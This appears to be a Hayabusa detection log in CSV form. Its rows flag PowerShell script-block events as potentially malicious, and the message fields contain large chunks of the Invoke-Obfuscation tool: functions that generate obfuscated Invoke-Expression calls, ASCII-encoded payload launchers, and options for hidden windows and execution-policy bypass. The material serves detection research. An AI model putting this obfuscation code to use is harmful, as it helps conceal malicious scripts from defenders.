$SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 3 { # 3) -Join[Regex]::Matches($String,'.','RightToLeft') # Randomly choose to use 'RightToLeft' or concatenated version of this string in $JoinOptions below. If(Get-Random -Input (0..1)) { $RightToLeft = Out-ConcatenatedString $RightToLeftStr ""'"" } Else { $RightToLeft = ""'$RightToLeftStr'"" } # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]::$JoinStr("" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + "".$ValueStr"" + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $ScriptString = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } default {Write-Error ""An invalid value was passed to switch block.""; Exit;} } # Perform final check to remove ticks if they now precede lowercase special characters after the string is reversed. # E.g. ""testin`G"" in reverse would be ""G`nitset"" where `n would be interpreted as a newline character. $SpecialCharacters = @('a','b','f','n','r','t','v','0') ForEach($SpecialChar in $SpecialCharacters) { If($ScriptString.Contains(""``""+$SpecialChar)) { $ScriptString = $ScriptString.Replace(""``""+$SpecialChar,$SpecialChar) } } Return $ScriptString } Function Out-EncapsulatedInvokeExpression { <# .SYNOPSIS HELPER FUNCTION :: Generates random syntax for invoking input PowerShell command. Invoke-Obfuscation Function: Out-EncapsulatedInvokeExpression Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncapsulatedInvokeExpression generates random syntax for invoking input PowerShell command. It uses a combination of IEX and Invoke-Expression as well as ordering (IEX $Command , $Command | IEX). .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-EncapsulatedInvokeExpression {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green|Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # The below code block is copy/pasted into almost every encoding function so they can maintain zero dependencies and work on their own (I admit using this bad coding practice). # Changes to below InvokeExpressionSyntax block should also be copied to those functions. # Generate random invoke operation syntax. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = Out-RandomCase $InvokeExpression # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $ScriptString = (Get-Random -Input $InvokeOptions) Return $ScriptString }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedAsciiCommand { <# .SYNOPSIS Generates ASCII encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedAsciiCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedAsciiCommand encodes an input PowerShell scriptblock or path as an ASCII payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIntera -NoProf ""Invoke-Expression( ('87K114r105E116_101i45K72P111a115_116a32E39E72E101E108a108!111a32K87K111t114_108_100o33P39r32o45!70o111t114r101E103K114i111o117K110t100K67o111K108K111_114_32_71t114K101_101P110!59t32P87a114t105K116P101a45K72E111i115_116t32E39r79E98E102o117a115K99a97!116P105E111_110o32E82_111a99P107K115r33K39P32t45K70!111!114P101E103E114r111t117r110r100r67E111_108a111a114P32_71a114_101!101a110'-SplIt'_' -SPLit'a' -SPlIt'o' -SPlIt 'K' -SplIT 'P'-SPLit'r' -SPlIt 'E'-SPLiT '!'-SpLIt'i'-SPlIT 't'|ForEach-Object { ([Char][Int]$_)} )-Join '') "" C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join ((87 , 114 , 105 , 116, 101 , 45,72,111 ,115 ,116, 32 , 39 , 72 ,101 ,108 ,108, 111 , 32, 87 , 111, 114 ,108, 100, 33, 39,32 , 45, 70,111, 114, 101 ,103,114 , 111 ,117 ,110, 100 ,67, 111,108,111 ,114 ,32 ,71,114 , 101 ,101 ,110 , 59, 32, 87, 114, 105,116, 101 ,45 , 72, 111 , 115 , 116, 32 , 39 ,79, 98 ,102, 117,115 , 99 , 97, 116, 105 ,111, 110,32 , 82 , 111 , 99 ,107, 115 ,33 , 39, 32,45, 70, 111 , 114 ,101,103, 114, 111,117 , 110 , 100 , 67 , 111,108,111, 114, 32, 71, 114, 101 , 101, 110 ) | %{ ( [Int]$_ -AS [Char])} )|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. # Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([String]([Int][Char]$_) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' $RandomConversionSyntax += (""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"") $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. $NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Va",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.254 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.254 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedAsciiCommand { <# .SYNOPSIS Generates ASCII encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedAsciiCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedAsciiCommand encodes an input PowerShell scriptblock or path as an ASCII payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonIntera -NoProf ""Invoke-Expression( ('87K114r105E116_101i45K72P111a115_116a32E39E72E101E108a108!111a32K87K111t114_108_100o33P39r32o45!70o111t114r101E103K114i111o117K110t100K67o111K108K111_114_32_71t114K101_101P110!59t32P87a114t105K116P101a45K72E111i115_116t32E39r79E98E102o117a115K99a97!116P105E111_110o32E82_111a99P107K115r33K39P32t45K70!111!114P101E103E114r111t117r110r100r67E111_108a111a114P32_71a114_101!101a110'-SplIt'_' -SPLit'a' -SPlIt'o' -SPlIt 'K' -SplIT 'P'-SPLit'r' -SPlIt 'E'-SPLiT '!'-SpLIt'i'-SPlIT 't'|ForEach-Object { ([Char][Int]$_)} )-Join '') "" C:\PS> Out-EncodedAsciiCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru -Join ((87 , 114 , 105 , 116, 101 , 45,72,111 ,115 ,116, 32 , 39 , 72 ,101 ,108 ,108, 111 , 32, 87 , 111, 114 ,108, 100, 33, 39,32 , 45, 70,111, 114, 101 ,103,114 , 111 ,117 ,110, 100 ,67, 111,108,111 ,114 ,32 ,71,114 , 101 ,101 ,110 , 59, 32, 87, 114, 105,116, 101 ,45 , 72, 111 , 115 , 116, 32 , 39 ,79, 98 ,102, 117,115 , 99 , 97, 116, 105 ,111, 110,32 , 82 , 111 , 99 ,107, 115 ,33 , 39, 32,45, 70, 111 , 114 ,101,103, 114, 111,117 , 110 , 100 , 67 , 111,108,111, 114, 32, 71, 114, 101 , 101, 110 ) | %{ ( [Int]$_ -AS [Char])} )|IEX .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( 